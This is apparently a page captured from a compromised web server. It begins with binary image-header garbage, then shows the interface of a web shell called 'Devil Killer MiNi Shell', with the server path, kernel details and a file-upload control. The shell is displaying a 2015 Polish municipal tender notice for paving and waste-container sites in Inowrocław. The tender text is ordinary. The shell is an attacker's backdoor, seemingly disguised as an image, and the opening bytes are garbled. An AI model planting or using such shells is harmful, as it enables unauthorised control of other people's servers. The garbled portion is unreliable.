JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150507/106316-N-2015.html

<p class="kh_header"><b>Inowrocław: UTWARDZENIE NAWIERZCHNI POD POJEMNIKI DO SELEKTYWNEJ ZBIÓRKI ODPADÓW KOMUNALNYCH WRAZ Z WYKONANIEM DRÓG DOJAZDOWYCH 
I MIEJSC POSTOJOWYCH PRZY UL. ALEJNIKA, UL. ZAPADŁE, 
UL. SZYBOWCOWEJ I UL. KĄTNEJ W INOWROCŁAWIU</b><br>
<b>Numer ogłoszenia: 106316 - 2015; data zamieszczenia: 07.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Inowrocław , ul. F. D. Roosevelta 36, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 52 3555250, faks 52 3555233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.inowroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UTWARDZENIE NAWIERZCHNI POD POJEMNIKI DO SELEKTYWNEJ ZBIÓRKI ODPADÓW KOMUNALNYCH WRAZ Z WYKONANIEM DRÓG DOJAZDOWYCH 
I MIEJSC POSTOJOWYCH PRZY UL. ALEJNIKA, UL. ZAPADŁE, 
UL. SZYBOWCOWEJ I UL. KĄTNEJ W INOWROCŁAWIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utwardzenie nawierzchni pod pojemniki do selektywnej zbiórki odpadów komunalnych wraz z wykonaniem dróg dojazdowych, miejsc postojowych, odwodnieniem, oświetleniem, rekultywacji terenów zielonych, instalacji monitoringu przy ul. Alejnika, ul. Zapadłe, ul. Szybowcowej i ul. Kątnej w Inowrocławiu, zgodnie z dokumentacją projektową i specyfikacjami technicznymi wykonania i odbioru robót budowlanych załączonymi do  SIWZ.
Przedmiot zamówienia podzielony jest na 4 części (wykonawcy mogą składać oferty na dowolną liczbę części).
Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót budowlanych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.13.00-1, 45.23.31.20-6, 45.23.32.00-1, 45.23.11.10-9, 45.31.61.10-9, 45.23.32.90-8, 35.12.53.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z zasadami sztuki budowlanej wykonali i  prawidłowo ukończyli co najmniej 2 roboty budowlane branży drogowej w zakres których wchodziło wykonanie:
1) cz.1 - robót drogowych o wartości nie niższej niż 150 000 zł brutto (nawierzchnia z kostki betonowej) wraz z wykonaniem oświetlenia drogowego przynajmniej w jednym zadaniu;
2) cz. 2 - robót drogowych o wartości nie niższej niż 140 000 zł brutto (nawierzchnia z kostki betonowej) wraz z wykonaniem oświetlenia drogowego przynajmniej w jednym zadaniu;
3) cz. 3 - robót drogowych o wartości nie niższej niż 100 000 zł brutto (nawierzchnia z kostki betonowej) wraz z wykonaniem oświetlenia drogowego i kanalizacji deszczowej przynajmniej w jednym zadaniu;
4) robót drogowych o wartości nie niższej niż 100 000 zł brutto (nawierzchnia z kostki betonowej).
Wykonawcy składający ofertę na więcej niż jedną część zamówienia będą  zobowiązani wykazać, że wykonali i  prawidłowo ukończyli co najmniej 2 roboty budowlane o zakresie i wartości wynikającej z sumy warunków poszczególnych części zamówienia.
Ocena spełniania warunku będzie dokonana na podstawie złożonego wykazu wykonanych robót budowlanych i  dokumentów potwierdzających, że roboty zostały wykonane w sposób należyty oraz wskazujących ich wykonanie zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia, na zasadzie spełnia/nie spełnia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują  osobami posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi w specjalnościach:
- drogowej,
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
bądź też odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów.
Ocena spełniania warunku zostanie dokonana na podstawie złożonego wykazu osób, które będą uczestniczyć w wykonywaniu zamówienie oraz oświadczenia, że osoby te posiadają wymagane uprawnienia, na zasadzie spełnia/nie spełnia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy  posiadają środki finansowe (lub zdolność kredytową) w wysokości co najmniej:
1) cz. 1 -  150.000,00 zł,
2) cz. 2 - 140 000,00 zł
3) cz. 3 - 100 000,00 zł
4) cz. 4 - 110 000,00 zł. 
Wykonawcy składający ofertę na więcej niż jedną część zamówienia będą  zobowiązani wykazać, że posiadają środki finansowe (lub zdolność kredytową) w wysokości co najmniej sumy ww. kwot dotyczących poszczególnych części zamówienia.

Spełnianie warunku zostanie ocenione na podstawie złożonej informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy;  na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95.00</li>
<li>2 - okres rękojmi za wady i gwarancji jakości - 5.00</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany umowy w stosunku do treści oferty w następujących okolicznościach:
1)	gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT);
2)	konieczności zmiany terminu realizacji w związku z:
a)	wprowadzeniem przez Zamawiającego koniecznych zmian w dokumentacji projektowej lub
b) brakiem możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych, lub
c) działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego, lub
d) nieterminowym, z przyczyn niezależnych od Wykonawcy, przekazaniem przez  Zamawiającego terenu robót Wykonawcy, lub
e) wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezawinionych    przez Wykonawcę, lub
f) opóźnieniem związanym z uzyskiwaniem przez Wykonawcę niezbędnych w myśl ustawy Prawo budowlane dokumentów, lub
g) innymi okolicznościami niepowstałymi z winy Wykonawcy, lub
h) koniecznością wykonania zamówień dodatkowych;
3) zmiany warunków finansowania przedmiotu umowy uzasadnionej zmianami w budżecie Zamawiającego.
4) zmiana podwykonawcy - na pisemny wniosek Wykonawcy, dopuszcza się zmianę podwykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zamiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń wobec Wykonawcy z tytułu realizacji robót. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę;
Warunkiem wprowadzenia zmian do umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół konieczności wykonania wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. Inspektor nadzoru,  oraz kierownik budowy.
Zmiana umowy może nastąpić w formie pisemnego aneksu do umowy pod rygorem nieważności.
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę lecz nie stanowią zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.inowroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Inowrocławia, 88-100 Inowrocław, ul. Prezydenta Franklina Roosevelta 36, Zespół Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2015 godzina 10:00, miejsce: Urząd Miasta Inowrocławia, 88-100 Inowrocław, ul. Prezydenta Franklina Roosevelta 36, punkt informacyjno-podawczy Biura Obsługi Interesantów i Kontroli.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> UTWARDZENIE NAWIERZCHNI POD POJEMNIKI DO SELEKTYWNEJ ZBIÓRKI ODPADÓW KOMUNALNYCH WRAZ Z WYKONANIEM DRÓG DOJAZDOWYCH I MIEJSC POSTOJOWYCH PRZY UL. ALEJNIKA  W INOWROCŁAWIU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cz. 1 ul. Alejnika:  zamówienie obejmuje wykonanie:
a)	rozbiórek i robót ziemnych,
b)	drogi dojazdowej o długości 38,26 m od strony Al. 800-lecia Inowrocławia,
c)	8  stanowisk parkingowych wraz z drogą manewrową o długości 36,36m,
d)	placu pod pojemniki do selektywnej zbiórki odpadów komunalnych o wymiarach 5,0x6,0m,
nawierzchnia z kostki brukowej betonowej gr. 8 cm na podbudowie z betonu o grubości 15 cm - na jezdniach kostka szara, na placu pod kontenery - czerwona, na parkingach - antracytowa z wyróżnieniem stanowisk kostką białą lub żółtą;
e)	krawężników i obrzeży na ławie betonowej z oporem,
f)	kratki ściekowej z przyłączem o długości 14,0m, 
g)	regulacji kratek ściekowych, pokryw studni, skrzynek zaworów,
h)	2 nowych latarni i przestawienia 3 istniejących, instalacji kamery monitoringu,
i)	rekultywacji terenów zielonych,
j)	 oznakowania drogowego.
Do wykonawcy cz. 1 należy również załatwienie w imieniu Zamawiającego spraw formalnych oraz poniesienie ewentualnych kosztów  związanych z prowadzeniem robót w zasięgu uzbrojenia podziemnego (zgodnie z uzgodnieniami gestorów). Ponadto wykonawca w imieniu Zamawiającego załatwi sprawy formalne i poniesie opłaty związane z robotami na terenie kolejowym zgodnie z podanymi warunkami i uzgodnieniami.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.23.31.20-6, 45.23.32.00-1, 45.23.11.10-9, 45.31.61.10-9, 45.23.32.90-8, 35.12.53.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 75.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95.00</li>
<li>2. okres rękojmi za wady i gwarancji jakości - 5.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> UTWARDZENIE NAWIERZCHNI POD POJEMNIKI DO SELEKTYWNEJ ZBIÓRKI ODPADÓW KOMUNALNYCH WRAZ Z WYKONANIEM DRÓG DOJAZDOWYCH I MIEJSC POSTOJOWYCH PRZY  UL. ZAPADŁE W INOWROCŁAWIU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cz. 2 ul. Zapadłe: zamówienie obejmuje wykonanie:
a)	rozbiórek i robót ziemnych,
b)	zjazdu z ul. Zapadłe,
c)	14 stanowisk parkingowych wraz z drogą manewrową o długości 18,60m,
d)	placu o wymiarach 5,0x6,0m pod pojemniki do selektywnej zbiórki odpadów komunalnych,
nawierzchnia z kostki brukowej betonowej gr. 8 cm na podbudowie z betonu o grubości 15 cm - na jezdniach kostka szara, na placu pod kontenery - czerwona, na parkingach - antracytowa z wyróżnieniem stanowisk kostką białą lub żółtą;
e)	krawężników i obrzeży na ławie betonowej z oporem,
f)	regulacji kratek ściekowych, pokryw studni, skrzynek zaworów,
g)	naprawy nawierzchni bitumicznej przy budowanym zjeździe w ul. Zapadłe,
h)	2 nowych latarni i wymiany opraw w 4 istniejących latarniach, 
i)	kamery monitoringu,
j)	rekultywacji terenów zielonych i nasadzenia 12 drzew,
k)	oznakowania drogowego.
Do wykonawcy cz. 2 zamówienia należy również załatwienie w imieniu Zamawiającego spraw formalnych oraz poniesienie ewentualnych kosztów  związanych z prowadzeniem robót w zasięgu uzbrojenia podziemnego (zgodnie z uzgodnieniami gestorów).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.13.00-1, 45.23.31.20-6, 45.23.32.00-1, 45.31.61.10-9, 45.23.32.90-8, 35.12.53.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95.00</li>
<li>2. okres rękojmi za wady i gwarancji jakości - 5.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> UTWARDZENIE NAWIERZCHNI POD POJEMNIKI DO SELEKTYWNEJ ZBIÓRKI ODPADÓW KOMUNALNYCH WRAZ Z WYKONANIEM DRÓG DOJAZDOWYCH I MIEJSC POSTOJOWYCH PRZY  UL. SZYBOWCOWEJ W INOWROCŁAWIU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cz. 3 ul. Szybowcowa: zamówienie obejmuje wykonanie:
a)	robót ziemnych,
b)	remontu zjazdu z ul. Szybowcowej,
c)	remont nawierzchni bitumicznej przy chodniku dł. 24,0 m,
d)	przebudowy nawierzchni chodnika dł. 24 m,
e)	placu o wymiarach 14,5 x 26,0 m z wydzieleniem miejsca pod pojemniki do selektywnej zbiórki odpadów komunalnych,
nawierzchnia z kostki brukowej betonowej gr. 8 cm na podbudowie z betonu o grubości 15 cm - na placu i zjeździe - kostka szara, pod kontenerami - czerwona;
f)	krawężników i obrzeży na ławie betonowej z oporem,
g)	1 kratki ściekowej i regulacji kratek ściekowych, pokryw studni, skrzynek zaworów,
h)	przyłącza kanalizacyjnego o długości 25,0 m z kaskadą i studnią pośrednią, częściowo z wykorzystaniem przewiertu,
i)	1 nowej latarni, 
j)	kamery monitoringu,
k)	rekultywacji terenów zielonych,
l)	oznakowania drogowego.
Do wykonawcy cz. 3 zamówienia należy również załatwienie w imieniu Zamawiającego praw formalnych oraz poniesienie ewentualnych kosztów  związanych z prowadzeniem robót w zasięgu uzbrojenia podziemnego (zgodnie z uzgodnieniami gestorów).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.13.00-1, 45.23.31.20-6, 45.23.32.00-1, 45.23.11.10-9, 45.31.61.10-9, 45.23.32.90-8, 35.12.53.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95.00</li>
<li>2. okres rękojmi za wady i gwarancji jakości - 5.00</li>
</ul>
</li>
</ul><br>
